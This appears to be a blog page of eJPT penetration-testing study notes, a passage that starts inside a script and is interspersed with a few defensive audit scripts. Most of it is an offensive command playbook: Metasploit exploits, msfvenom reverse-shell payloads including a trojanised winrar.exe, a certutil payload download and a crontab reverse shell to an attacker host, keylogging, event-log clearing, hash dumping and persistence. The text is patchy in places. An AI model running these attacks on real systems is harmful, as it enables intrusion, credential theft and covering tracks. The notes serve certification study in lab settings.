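        with open(p, "w") as fh:
            fh.write("#!/bin/bash\necho ok\n")
    os.chmod(bad, 0o777)    # world-writable: anyone can change what root runs
    os.chmod(good, 0o755)
    suid = os.path.join(root, "welcome")       # constructed stand-in for a SUID binary
    with open(suid, "w") as fh:
        fh.write("binary placeholder\n")
    os.chmod(suid, 0o4755)  # SUID bit set
    crontab = (
        "# constructed sample /etc/crontab\n"
        "SHELL=/bin/bash\n"
        "* * * * * root /usr/local/share/copy.sh\n"
        "0 3 * * * root /usr/local/share/backup.sh --full\n"
        "@reboot student /home/student/start.sh\n"
    )
    return audit_cron(crontab, root_fs=root), find_suid(root)


if __name__ == "__main__":
    cron_findings, suid_files = demo()
    print("root cron jobs running scripts writable by others:", cron_findings)
    print("SUID files:", suid_files)
```

The remediation for a finding like copy.sh is the mirror image of the escalation: make the script owned by root with mode 0755 (or tighter) and keep its parent directory non-writable, so that what root executes on schedule can only be changed by root.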
  > whoami
  > groups <user>
  > ls -la
  > file welcome
  > strings welcome
  > rm greetings
  > cp /bin/bash greetings
  > ./welcome
  > cat /etc/shadow

Dumping Linux Password Hashes
  Prefix:
    $1 → MD5
    $2 → Blowfish
    $5 → SHA-256
    $6 → SHA-512
  > nmap -sV <IP>
  > searchsploit proftpd
  > setg RHOSTS <IP>
  > search proftpd
  > use exploit/unix/ftp/proftpd_133c_backdoor
  > show options
  > set payload payload/cmd/unix/reverse
  > exploit
  > /bin/bash -i
  > id
  // Go in background
  > sessions
  > sessions -u 1
  > sysinfo
  > getuid
  > cat /etc/shadow   // Get hash
  > use post/linux/gather/hashdump
  > show options
  > set SESSION 2
  > run
  // Crack hash
  > use auxiliary/analyze/crack_linux
  > set SHA512 true
  > run

Network-Based Attacks

Firewall Detection & IDS Evasion
  > nmap -Pn -sS -F <IP>          // -F → Fast Scan
  > nmap -Pn -sS -sV -F -f <IP>   // -f → Fragment Packets

SMB & NetBIOS Enumeration
  NetBIOS → API & a set of network protocols providing communication services over a local network. It is used primarily to allow applications on different computers to find & interact with each other on a network
  SMB → A network file sharing protocol that allows computers on a network to share files, printers, & other resources.
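The $id$ prefixes listed under "Dumping Linux Password Hashes" are what tell a cracker (or an auditor) how expensive each hash is to attack. The following is an added example (not from the original notes) that parses /etc/shadow-format lines, identifies the scheme from the prefix table above, extends it with the $y$ (yescrypt) prefix that crypt(5) documents alongside them, and flags accounts whose stored password is empty, locked, legacy DES, or MD5. The shadow lines are constructed sample data with placeholder hash bodies, not real credential material.

```python
# Added example (not from the original notes): an audit of /etc/shadow-format
# lines that identifies the hash algorithm from the $id$ prefix and flags
# accounts whose password is stored with a weak scheme, is empty, or is
# locked. The shadow lines are constructed sample data with placeholder hashes.
import re

# $id$ prefixes from the notes plus $y$ (yescrypt), which crypt(5) also documents.
SCHEMES = {
    "1": "MD5",
    "2": "Blowfish (bcrypt)",   # also $2a$, $2b$, $2y$
    "5": "SHA-256",
    "6": "SHA-512",
    "y": "yescrypt",
}
WEAK = {"MD5"}   # fast to compute, so wordlist attacks like crack_linux are cheap


def classify_hash(field):
    """Return (scheme, rounds) for the password field of one shadow entry."""
    if field == "":
        return ("EMPTY (no password required)", None)
    if field.startswith(("!", "*")):
        return ("LOCKED", None)
    m = re.match(r"^\$([0-9a-z]+)\$(?:rounds=(\d+)\$)?", field)
    if not m:
        return ("DES/unknown (no $id$ prefix)", None)
    ident = m.group(1)
    scheme = SCHEMES.get(ident[0], f"unknown ${ident}$")
    rounds = int(m.group(2)) if m.group(2) else None
    return (scheme, rounds)


def audit_shadow(text):
    """Parse shadow lines (user:hash:lastchg:min:max:warn:inactive:expire:flag)
    and report the scheme of each entry plus whether it needs attention."""
    report = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            continue
        user, field = parts[0], parts[1]
        scheme, rounds = classify_hash(field)
        weak = scheme in WEAK or scheme.startswith(("EMPTY", "DES"))
        report.append({"user": user, "scheme": scheme, "rounds": rounds, "weak": weak})
    return report


# Constructed sample: hash bodies are placeholders, not real credential material.
SAMPLE_SHADOW = """\
root:$6$rounds=656000$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
student:$1$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
backup:!:19000:0:99999:7:::
legacy:PLACEHOLDERDES:19000:0:99999:7:::
guest::19000:0:99999:7:::
"""


def weak_accounts(text=SAMPLE_SHADOW):
    """Usernames whose stored password should be rehashed, set, or disabled."""
    return [r["user"] for r in audit_shadow(text) if r["weak"]]


if __name__ == "__main__":
    for r in audit_shadow(SAMPLE_SHADOW):
        print(f"{r['user']:10} {r['scheme']:30} rounds={r['rounds']} weak={r['weak']}")
    print("needs attention:", weak_accounts())
```

Locked entries are reported but not flagged, since "*" and "!" mean no password will ever match; the entries worth acting on are MD5 (switch ENCRYPT_METHOD in /etc/login.defs and force a password change), DES with no prefix, and empty fields, which let anyone log in without a password.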
  > cat /etc/hosts
  > ping demo.ine.local    // reachable IP1
  > ping demo1.ine.local   // not reachable IP2
  > nmap demo.ine.local
  > nbtscan
  > whatis nbtscan
  > nbtscan <IP/Subnet>
  > nmblookup -A <IP1>
  > nmap -sU -p 137 <IP1>
  > nmap -sU -sV -p 137 -T4 --script=nbstat.nse -Pn -n <IP1>
  > nmap -sV -p 139,445 demo.ine.local
  > ls -la /usr/share/nmap/scripts/ | grep -e "smb-*"
  > nmap -p445 --script smb-protocols demo.ine.local
  > nmap -p445 --script smb-security-mode demo.ine.local
  > smbclient -L demo.ine.local   // testing for anonymous access → press enter
  > nmap -p445 --script smb-enum-users demo.ine.local
  > nano users.txt   // enter all usernames
  > hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
  > psexec.py [email protected]
  > whoami
  // MSF
  > search psexec
  > use exploit/windows/smb/psexec
  > set SMBUser <username>
  > set SMBPass <password>
  > set payload windows/x64/meterpreter/reverse_tcp
  > exploit
  > sysinfo
  > shell
  > ping <IP2>
  // Exit
  > run autoroute -s <IP2/Subnet>   // /20 → Meterpreter
  > background
  > search socks
  > use auxiliary/server/socks_proxy
  > set VERSION 4a   // cat /etc/proxychains4.conf
  > set SRVPORT <ProxychainsPort>
  > run
  > netstat -antp
  // Machine 1
  > proxychains nmap demo1.ine.local -sT -Pn -sV -p 445
  // MSF
  > shell
  > net view <IP2>
  > background
  > migrate -N explorer.exe
  > shell
  > net view <IP2>
  > net use D: \\<IP2>\Documents
  > net use K: \\<IP2>\K$
  > dir D:

SNMP Enumeration
  > cat /etc/hosts
  > nmap -sU -sV -p 161 demo.ine.local
  > ls -la /usr/share/nmap/scripts | grep -e "snmp-*"
  > ls -la /usr/share/nmap/nselib/data/ | grep snmp
  > nmap -sU -p 161 --script=snmp-brute demo.ine.local
  > snmpwalk -v 1 -c public demo.ine.local
  > nmap -sU -p 161 --script=snmp-* demo.ine.local
  > snmp_results   // Enumerate users, etc.
  > hydra -l administrator -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb

SMB Relay Attack
  It is a type of network attack where an attacker intercepts SMB traffic, manipulates it & relays it to a legitimate server to gain unauthorized access to resources or perform malicious actions
  > search smb_relay
  > use exploit/windows/smb/smb_relay
  > set SRVHOST <IP>   // Kali Linux IP - ifconfig
  > set LHOST <IP>     // Kali Linux IP - ifconfig
  > set SMBHOST <IP>   // Check lab docs
  // New Tab
  > echo "<Kali-IP> *.sportsfoo" > dns
  > dnsspoof -i eth1 -f dns

Metasploit

MSFVenom
  x86 → 32 bit
  > msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe
  > msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx64.exe
  > msfvenom --list formats
  > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f elf > payloadx86.elf
  // SHELLCODE
  // -i → Iterations
  // -e → Encoding
  // -x → Inject in file
  // -k → Keep original behavior of file (ex. winrar.exe)
  > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe > encodedx86.exe
  > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > encodedx86.exe
  > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > encodedx86
  > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -x ~/Downloads/winrar601.exe > winrar.exe
  > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -k -x ~/Downloads/winrar601.exe > winrar.exe
  // MSF Scripts
  > msfconsole -r handler.rc

HTTP File Server (HFS)
  > db_nmap -sS -sV -O <IP>
  > search type:exploit name:rejetto
  > use exploit/windows/http/rejetto_hfs_exec
  > set RHOSTS <IP>
  > exploit   // 32-bit session
  > set payload windows/x64/meterpreter/reverse_tcp
  > exploit   // 64-bit session

Apache Tomcat Java Server
  > setg RHOSTS <IP>
  > db_nmap -sS -sV -O <IP>
  > services
  > search type:exploit tomcat_jsp
  > use exploit/multi/http/tomcat_jsp_upload_bypass
  > set payload java/jsp_shell_bind_tcp
  > set LHOST & LPORT
  > set SHELL cmd
  > exploit
  > background the session
  > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali-IP> LPORT=1234 -f exe > meterpreter.exe
  > sudo python -m SimpleHTTPServer 80
  > sessions 1
  > certutil -urlcache -f http://<Kali-IP>/meterpreter.exe meterpreter.exe
  > dir
  // Continue
  > nano handler.rc
      use multi/handler
      set PAYLOAD windows/meterpreter/reverse_tcp
      set LHOST <Kali-IP>
      set LPORT 1234
      run
    SAVE THE FILE
  > msfconsole -r handler.rc
  > .\meterpreter.exe   // Resume after running handler.rc
  > sysinfo
  > getuid

FTP Server
  > setg RHOSTS <IP>
  > db_nmap -sS -sV -O <IP>
  > services
  > analyze
  > search vsftpd
  > use exploit/unix/ftp/vsftpd_234_backdoor
  > exploit
  > background
  > sessions
  > search shell_to_meterpreter
  > use post/multi/manage/shell_to_meterpreter
  > set LHOST <kali-ip>
  > set LHOST eth1
  > set SESSION <ID>
  > run
  > sessions 2
  > sysinfo

SAMBA : File Sharing Service
  > setg RHOSTS <IP>
  > db_nmap -sS -sV -O <IP>
  > search type:exploit name:samba
  > use exploit/linux/samba/is_known_pipename
  > check   // check if it's vulnerable
  > run
  > ls / pwd
  > background
  > search shell_to_meterpreter
  > use post/multi/manage/shell_to_meterpreter
  > set LHOST eth1
  > set SESSION <ID>
  > run
  > sessions 2
  > sysinfo

SSH
  > setg RHOSTS <IP>
  > db_nmap -sS -sV -O <IP>
  > search libssh_auth_bypass
  > use auxiliary/scanner/ssh/libssh_auth_bypass
  > set SPAWN_PTY true
  > run
  > sessions 1
  > background
  > search shell_to_meterpreter
  > use post/multi/manage/shell_to_meterpreter
  > set LHOST eth1
  > set SESSION <ID>
  > run
  > sessions 2

SMTP
  > setg RHOSTS <IP>
  > db_nmap -sV -O <IP>
  > search type:exploit name:haraka
  > use exploit/linux/smtp/haraka
  > set SRVPORT 9898
  > set email_to [email protected]
  > set payload linux/x64/meterpreter_reverse_http
  > set LHOST eth1

Meterpreter
  > edit flag1   // Text Editor
  > download flag1
  > checksum md5 /bin/bash
  > getenv PATH
  > search -d /usr/bin -f *backdoor*
  > search -f *.jpg
  > search -f *.php
  > shell
  > ps   // Running Processes
  > migrate <pid>
  > sessions -u 1   // Upgrade shell to Meterpreter session

Windows Post Exploitation Modules
  > setg RHOSTS <IP>
  > db_nmap -sV <IP>
  > search rejetto
  > use exploit/windows/http/rejetto_hfs_exec
  > run
  > getsystem   // elevate privileges
  > getuid
  > hashdump
  > show_mount
  > ps   // list processes
  > migrate <pid>
  > search win_privs
  > use post/windows/gather/win_privs
  > set SESSION <id>
  > run
  > search enum_logged
  > use post/windows/gather/enum_logged_on_users
  > set SESSION <id>
  > run
  > search checkvm
  > use post/windows/gather/checkvm
  > set SESSION <id>
  > run
  > search enum_applications
  > use post/windows/gather/enum_applications
  > set SESSION <id>
  > run
  > loot   // Results stored in the DB
  > use post/windows/gather/windows_av_excluded
  > set SESSION 1
  > run
  > search enum_computer
  > use post/windows/gather/enum_computers
  > search enum_patches
  > use post/windows/gather/enum_patches
  > use post/windows/gather/enum_shares
  > use post/windows/manage/enable_rdp
  > set SESSION <id>
  > run

UAC Bypass
  > use exploit/windows/http/rejetto_hfs_exec
  > set payload windows/x64/meterpreter/reverse_tcp
  > set LHOST eth1
  > exploit
  > sysinfo
  > getuid
  > getsystem
  > getprivs
  > shell
  > net users
  > net localgroup administrators
  > background
  > search bypassuac
  > use exploit/windows/local/bypassuac_injection
  > set payload windows/x64/meterpreter/reverse_tcp
  > set SESSION 1
  > set LPORT 1234
  > run
  > set TARGET Windows\ x64
  > run
  > getsystem
  > hashdump

Token Impersonation With Incognito
  > use exploit/windows/http/rejetto_hfs_exec
  > set payload windows/x64/meterpreter/reverse_tcp
  > set LHOST eth1
  > exploit
  > sysinfo
  > getprivs
  > load incognito
  > list_tokens -u
  > impersonate_token "ATTACKDEFENSE\Administrator"
  > getuid
  > migrate <>
  > getuid

Windows Persistence
  > use exploit/windows/http/rejetto_hfs_exec
  > set payload windows/x64/meterpreter/reverse_tcp
  > set LHOST eth1
  > exploit
  > background
  > search platform:windows name:persistence
  > use exploit/windows/local/persistence_service
  > set payload windows/x64/meterpreter/reverse_tcp
  > set SESSION 1
  > exploit
  > set payload windows/meterpreter/reverse_tcp
  > exploit
  > sysinfo
  > sessions -K
  > use multi/handler
  > set LHOST eth1
  > run

Enabling RDP
  > use exploit/windows/http/badblue_passthru
  > set RHOSTS
  > set target Badblue\ EE\ 2.7\ Universal
  > exploit
  > background
  > search enable_rdp
  > use post/windows/manage/enable_rdp
  > set SESSION 1
  > exploit
  > db_nmap -sV -p 3389 <IP>
  > shell
  > net user administrator hacker_123321   // Change Password
  > xfreerdp /u:administrator /p:hacker_123321 /v:<IP>

Windows Keylogging
  > use exploit/windows/http/badblue_passthru
  > exploit
  > pgrep explorer
  > migrate <ID>
  > keyscan_start
  > keyscan_dump

Clearing Windows Event Logs
  > use exploit/windows/http/badblue_passthru
  > exploit
  > clearev   // Deletes Event Logs

Windows Pivoting
  > use exploit/windows/http/rejetto_hfs_exec
  > exploit
  > sysinfo
  > ipconfig   // Copy the IP which is from the same subnet : Victim 2
  > run autoroute -s <IP>/<range>   (Range-20)
  > background
  > use auxiliary/scanner/portscan/tcp
  > set RHOSTS <Victim2>
  > set PORTS 1-100
  > exploit
  > sessions 1
  > portfwd add -l 1234 -p 80 -r <Victim-2-IP>
  > background
  > db_nmap -sS -sV -p 1234 localhost
  > use exploit/windows/http/badblue_passthru
  > set payload windows/meterpreter/bind_tcp
  > set RHOSTS <V-2-IP>
  > set LPORT 4433
  > exploit
  > sysinfo

Linux Post Exploitation

Post-Exploitation Modules
  > search samba
  > use exploit/linux/samba/is_known_pipename
  > set RHOSTS <IP>
  > exploit
  > pwd
  > background
  > sessions -u 1
  > sessions 2
  > sysinfo
  > getuid
  > shell
  > /bin/bash -i
  > whoami
  > uname -r
  > uname -a
  > ifconfig
  > ip a s
  > netstat -antp
  > ps aux
  > env
  > terminate
  > sessions -u 1
  > search enum_configs
  > set SESSION <Meterpreter>
  > run
  > loot
  > search env platform:linux
  > use post/multi/gather/env
  > set SESSION <id>
  > run
  > search enum_network
  > use post/linux/gather/enum_network
  > set SESSION <id>
  > run
  > search enum_protections
  > set SESSION <id>
  > run
  > notes
  > search enum_system
  > set SESSION <id>
  > run
  > search checkcontainer
  > set SESSION <id>
  > run
  > search enum_users_history
  > set SESSION <id>
  > run

Linux Privilege Escalation
  > setg RHOSTS <IP>
  > search ssh_login
  > use auxiliary/scanner/ssh/ssh_login
  > set USERNAME jackie
  > set PASSWORD password
  > exploit
  > sessions 1
  > pwd
  > whoami
  > background
  > sessions -u 1
  > sessions 2
  > sysinfo
  > getuid
  > bash
  > ps aux
  > cat /bin/check-down
  > chkrootkit --help
  > chkrootkit -V
  > background
  > search chkrootkit
  > show options
  > set CHKROOTKIT /bin/chkrootkit
  > set SESSION <mp-id>
  > set LHOST eth1
  > exploit
  > /bin/bash -i

Dumping Hashes with Hashdump
  > setg RHOSTS <IP>
  > use exploit/linux/samba/is_known_pipename
  > exploit
  > sessions -u 1
  > sessions 2
  > sysinfo
  > getuid
  > background
  > search hashdump
  > use post/linux/gather/hashdump
  > show options
  > set SESSION <id>
  > run
  > loot
  > sessions 3
  > /bin/bash -i

Establishing Persistence on Linux
  > use auxiliary/scanner/ssh/ssh_login
  > set USERNAME jackie
  > set PASSWORD password
  > exploit
  > sessions
  > sessions -u 1
  > sessions 2
  > search chkrootkit
  > set SESSION <id>
  > set CHKROOTKIT /bin/chkrootkit
  > set LHOST eth1
  > set LPORT <>
  > exploit
  > sessions -u 3
  > sessions 4
  > getuid
  > shell
  > /bin/bash -i
  > useradd -m ftp -s /bin/bash
  > passwd ftp   // enter: password123
  > cat /etc/passwd
  > groups root
  > usermod -aG root ftp
  > groups ftp
  > usermod -u 15 ftp
  > cat /etc/passwd
  > search platform:linux persistence
  > use exploit/linux/local/cron_persistence
  > set SESSION 4
  > set LPORT 4422
  > set LHOST eth1
  > exploit   // fail
  > use exploit/linux/local/service_persistence
  > set SESSION 4
  > set payload cmd/unix/reverse_python
  > set LPORT 4422
  > exploit   // fail
  > set target 4
  > exploit   // fail
  > use exploit/linux/local/sshkey_persistence
  > set CREATESSHFOLDER true
  > set SESSION 4
  > exploit
  > loot
  > cat private_key.txt   // use from loot
  > nano ssh_key   // paste the key
  > chmod 0400 ssh_key
  > ssh -i ssh_key root@<target-ip>

Exploitation

Banner Grabbing
  > nmap -sV -O <IP>
  > ls -la /usr/share/nmap/scripts | grep banner
  > nmap -sV --script=banner <IP>
  > nc <IP> <Port>

Nmap Vulnerability Scanning
  > nmap -sV -O <IP>
  > ls -la /usr/share/nmap/scripts/ | grep http
  > nmap -sV --script=http-enum <IP>

Post Exploitation Methodology
  Local Enumeration
  Transferring Files
  Upgrading Shells
  Privilege Escalation
  Persistence
  Dumping & Cracking Hashes
  Pivoting
  Clearing Tracks

Windows Enum

Users & Groups
  > use post/windows/gather/enum_logged_on_users
  > set SESSION 1
  > run
  > shell
  > net user administrator
  > whoami /priv
  > route print
  > netstat -ano
  > netsh firewall show state
  > tasklist /SVC   // Enumerate the list of running processes
  > show_mount
  > use post/windows/gather/win_privs
  > set SESSION 1
  > run
  > use post/windows/gather/enum_applications
  > use post/windows/gather/enum_computers
  > use post/windows/gather/enum_patches

Linux Enum
  > useradd bob -s
/bin/bash > githum.com/rebootuser/LinEnum Windows Priv Escalation > PrivescCheck > search web_delivery > use exploit/multi/script/web_delivery > set TARGET PSH\ (Binary) > set payload windows/shell/reverse_tcp > set PSH-EncodedCommand false > set LHOST eth1 > exploit > copy & paste in windows cmd > whoami > background > use shell_to_meterpreter > set LHOST eth1 > set WIN_TRANSFER VBS > exploit Linux Priv Escalation // Exploiting Permissions > whoami > cat /etc/passwd > find / -not -type l -perm -o+w > cat /etc/shadow > openssl passwd -1 -salt abc password > nano /etc/shadow // Remove * & paste the hash > su // Exploiting SUDO Privs > cat /etc/passwd > sudo -l > sudo man cat > !/bin/bash Linux Persistence // Via SSH Keys > ssh student@<IP> // password:password > ls -la > cat wait > cd .ssh > cat id_rsa > cat authorized_key > scp student@<IP>:~/.ssh/id_rsa . // copy id_rsa locally > chmod 400 id_rsa > ssh student@<IP> // password:password > rm wait > ssh -i id_rsa student@<IP> // Via Cron Jobs > ssh student@<IP> // password:password > cat /etc/cron* > echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali-ip>/<port> 0>&1'" > cron > cat cron > crontab -i cron > crontab -l > rm wait > nc -nvlp 1234 >
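The Linux persistence steps above (a new account moved into the root group and a low UID, an extra authorized_keys entry, a crontab line that opens a /dev/tcp reverse shell) each leave a trace in a file a defender can audit. The script below is an added example, not part of these notes or of any tool they mention: it parses constructed /etc/passwd, /etc/group, crontab and authorized_keys contents and reports the indicators those steps produce. File contents, the key baseline and the helper names (audit_passwd, audit_group, audit_crontab, audit_authorized_keys, run_audit) are all assumptions made for the example; the sample IP is from the documentation range.

```python
"""Defensive audit for the Linux persistence indicators listed in the notes.
Added example; all sample data below is constructed, not from a real host."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Cron command fragments that indicate a reverse shell, modelled on the
# crontab line in the notes (bash -i with a /dev/tcp redirect, or nc -e).
REVSHELL_RE = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|bash\s+-i\b")

# Shells that give an interactive login; nologin, false and sync do not.
LOGIN_SHELLS = ("/bash", "/sh", "/zsh", "/dash", "/ksh")


@dataclass(frozen=True)
class Finding:
    source: str  # which file the indicator came from
    detail: str  # human-readable description


def audit_passwd(passwd_text: str) -> list[Finding]:
    """Flag extra UID 0 accounts and system-range UIDs (<1000) that keep a
    login shell, which is what 'useradd ... -s /bin/bash' plus 'usermod -u 15'
    produces."""
    findings = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if line.startswith("#") or len(parts) != 7:
            continue
        name, uid, shell = parts[0], int(parts[2]), parts[6]
        if uid == 0 and name != "root":
            findings.append(Finding("passwd", f"extra UID 0 account: {name}"))
        elif 0 < uid < 1000 and shell.endswith(LOGIN_SHELLS):
            findings.append(Finding("passwd", f"system UID {uid} with login shell: {name}"))
    return findings


def audit_group(group_text: str) -> list[Finding]:
    """Flag any member listed on the root group line ('usermod -aG root')."""
    findings = []
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] == "root" and parts[3]:
            for member in parts[3].split(","):
                findings.append(Finding("group", f"member of root group: {member}"))
    return findings


def audit_crontab(crontab_text: str) -> list[Finding]:
    """Flag crontab entries whose command looks like a reverse shell."""
    findings = []
    for line in crontab_text.splitlines():
        if line.startswith("#") or not line.strip():
            continue
        if REVSHELL_RE.search(line):
            findings.append(Finding("crontab", f"reverse-shell style entry: {line.strip()}"))
    return findings


def audit_authorized_keys(keys_text: str, baseline: set[str]) -> list[Finding]:
    """Flag keys not in the approved baseline (key type plus base64 blob;
    leading options such as command="..." and the trailing comment are skipped)."""
    findings = []
    for line in keys_text.splitlines():
        fields = line.split()
        if not fields or line.startswith("#"):
            continue
        idx = next((i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-"))), None)
        if idx is None or len(fields) < idx + 2:
            continue
        key = f"{fields[idx]} {fields[idx + 1]}"
        if key not in baseline:
            comment = fields[idx + 2] if len(fields) > idx + 2 else "(no comment)"
            findings.append(Finding("authorized_keys", f"unapproved key: {comment}"))
    return findings


# Constructed sample file contents (assumption: not taken from any real system).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
student:x:1000:1000::/home/student:/bin/bash
ftp:x:15:1001::/home/ftp:/bin/bash
svc:x:0:0::/root:/bin/bash
"""
SAMPLE_GROUP = """root:x:0:ftp
sudo:x:27:student
"""
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'
"""
SAMPLE_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKnownKey student@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleUnknownKey root@unknown
"""
SAMPLE_BASELINE = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKnownKey"}


def run_audit() -> list[Finding]:
    """Run every check over the sample data and return all findings."""
    return (audit_passwd(SAMPLE_PASSWD) + audit_group(SAMPLE_GROUP)
            + audit_crontab(SAMPLE_CRONTAB)
            + audit_authorized_keys(SAMPLE_KEYS, SAMPLE_BASELINE))


if __name__ == "__main__":
    for f in run_audit():
        print(f"[{f.source}] {f.detail}")
```

On the sample data the audit reports the two suspicious passwd entries (ftp at UID 15 with a login shell, svc at UID 0), ftp's membership in the root group, the /dev/tcp crontab line and the key that is not in the baseline; on a real host you would feed it the actual files and a baseline captured before the engagement, and the system-UID heuristic will need an allowlist for distributions that ship login shells on service accounts.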

October 28, 2024 · 25 min · Dhanraj Chavan

Intro to EJPT

Intro
48 Hour Exam
35 Questions
Links
https://medium.com/@ls5747670/my-ejptv2-experience-and-tips-2024-a91954726fc5
https://infosecwriteups.com/mastering-the-ejptv2-exam-ec38daec16bc
https://aluvi.notion.site/eJPTv2-Complete-Cheat-sheet-d5b052c525d94c89b5d41183bd5c39fd
https://cisofy.com/lynis/
https://github.com/xonoxitron/INE-eJPT-Certification-Exam-Notes-Cheat-Sheet
https://github.com/Nater-aide/EJPT/blob/main/Notes/Wordpress.md
https://github.com/miazga-git/eJPT-Study-Notes
https://github.com/syselement/ine-notes/blob/main/ejpt/ejpt-cheatsheet.md
https://github.com/Nater-aide/EJPT/blob/main/Notes/MYSQL.mdk

October 28, 2024 · 1 min · Dhanraj Chavan